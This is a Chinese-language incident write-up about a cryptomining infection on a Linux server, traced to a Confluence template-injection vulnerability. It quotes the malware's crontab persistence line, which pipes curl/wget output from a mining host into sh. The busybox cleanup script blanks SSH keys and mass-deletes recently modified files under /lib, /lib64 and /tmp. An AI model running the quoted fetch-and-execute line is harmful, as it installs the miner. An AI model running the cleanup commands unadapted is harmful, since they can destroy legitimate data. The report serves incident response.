一、问题描述
7.17凌晨1点左右,突然接收到服务器报警CPU达到100%,负载飙高,TCP连接数明显突增,部分业务无法正常访问。
紧急登入服务器进行排查,top发现polkitds占用大量CPU,kill进程后,隔了几分钟CPU再次飙高,last,w等命令无法正常使用,怀疑受到病毒攻击,排查crontab时发现如下计划任务且删除无效,同时.bashrc也发现相同命令:
*/15 * * * * (curl -fsSL lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
查询发现lsd.systemten.org是一个挖矿网站,故确定中了挖矿病毒
二、处理方式
参考:https://blog.csdn.net/u010457406/article/details/89328869
切断服务器网络,前往busybox官网下载最新版安装包busybox-1.30.1.tar.bz2,安装过程如下:
cd busybox-1.30.1/
make defconfig
make
make install
ln -s `pwd`/busybox /usr/bin/busybox
busybox|grep BusyBox |grep v
编写busybox修复脚本
#!/bin/bash
#可以重复执行几次,防止互相拉起导致删除失败
function installBusyBox(){
#参考第一段
busybox|grep BusyBox |grep v
}
function banHosts(){
#删除免密认证,防止继续通过ssh进行扩散,后续需自行恢复,可不执行
busybox echo "" > /root/.ssh/authorized_keys
busybox echo "" > /root/.ssh/id_rsa
busybox echo "" > /root/.ssh/id_rsa.pub
busybox echo "" > /root/.ssh/known_hosts
busybox echo "" > /root/.ssh/auth
#iptables -I INPUT -p tcp --dport 445 -j DROP
busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts
}
function fixCron(){
#修复crontab
busybox chattr -i /etc/cron.d/root 2>/dev/null
busybox rm -f /etc/cron.d/root
busybox chattr -i /var/spool/cron/root 2>/dev/null
busybox rm -f /var/spool/cron/root
busybox chattr -i /var/spool/cron/tomcat 2>/dev/null
busybox rm -f /var/spool/cron/tomcat
busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -rf /var/spool/cron/tmp.*
busybox rm -rf /var/spool/cron/crontabs
busybox touch /var/spool/cron/root
busybox chattr +i /var/spool/cron/root
}
function killProcess(){
#修复异常进程
busybox ps -ef | busybox grep -v grep | busybox grep 'kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
busybox rm -f /tmp/khugepageds
busybox rm -f /usr/sbin/kerberods
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /usr/sbin/kintegrityds
busybox rm -f /usr/sbin/kpsmouseds
busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf
}
function clearLib(){
#修复动态库
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcryptod.so
busybox rm -f /usr/local/lib/libcset.so
busybox chattr -i /etc/ld.so.preload 2>/dev/null
busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null
busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null
busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf
busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf
busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf
busybox rm -f /etc/ld.so.cache
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcryptod.so
busybox rm -f /usr/local/lib/libcset.so
busybox rm -rf /usr/local/lib/libdevmapped.so
busybox rm -rf /usr/local/lib/libpamcd.so
busybox rm -rf /usr/local/lib/libdevmapped.so
busybox touch /etc/ld.so.preload
busybox chattr +i /etc/ld.so.preload
ldconfig
}
function clearInit(){
#修复异常开机项
#chkconfig netdns off 2>/dev/null
#chkconfig –del netdns 2>/dev/null
#systemctl disable netdns 2>/dev/null
busybox rm -f /etc/rc.d/init.d/kerberods
busybox rm -f /etc/init.d/netdns
busybox rm -f /etc/rc.d/init.d/kthrotlds
busybox rm -f /etc/rc.d/init.d/kpsmouseds
busybox rm -f /etc/rc.d/init.d/kintegrityds
#chkconfig watchdogs off 2>/dev/null
#chkconfig --del watchdogs 2>/dev/null
#chkconfig --del kworker 2>/dev/null
#chkconfig --del netdns 2>/dev/null
}
function recoverOk(){
service crond start
busybox sleep 3
busybox chattr -i /var/spool/cron/root
echo "OK,BETTER REBOOT YOUR DEVICE"
}
#先停止crontab服务
service crond stop
#防止病毒继续扩散
banHosts
#清除lib劫持
clearLib
#修复crontab
fixCron
killProcess
clearLib
killProcess
#删除异常开机项
clearInit
fixCron
recoverOk
如果查杀不成功,重复进行多次查杀,尽量在短时间内完成所有操作并重启,防止病毒利用已加载的动态链接库恢复感染!!!
三、分析病毒来源
参考:https://www.freebuf.com/vuls/200477.html
通过查询发现confluence最近发布一个新的漏洞,Confluence Server与Confluence数据中心中的Widget连接器存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越与远程代码执行。
涉及版本:影响版本6.6.7之前的所有版本的Confluence Server和Confluence数据中心,6.8.5之前的版本6.7.0(6.8.x的固定版本),6.9.3之前的6.9.0版本(6.9的固定版本)
服务器上安装了confluence-6.8.1,导致此次挖矿病毒入侵
四、安全加固
1.定期查看已安装的软件是否发布漏洞警告,及时升级版本或补丁
2.谨慎使用免密登录
3.禁止ROOT登录,在特殊需求下再开启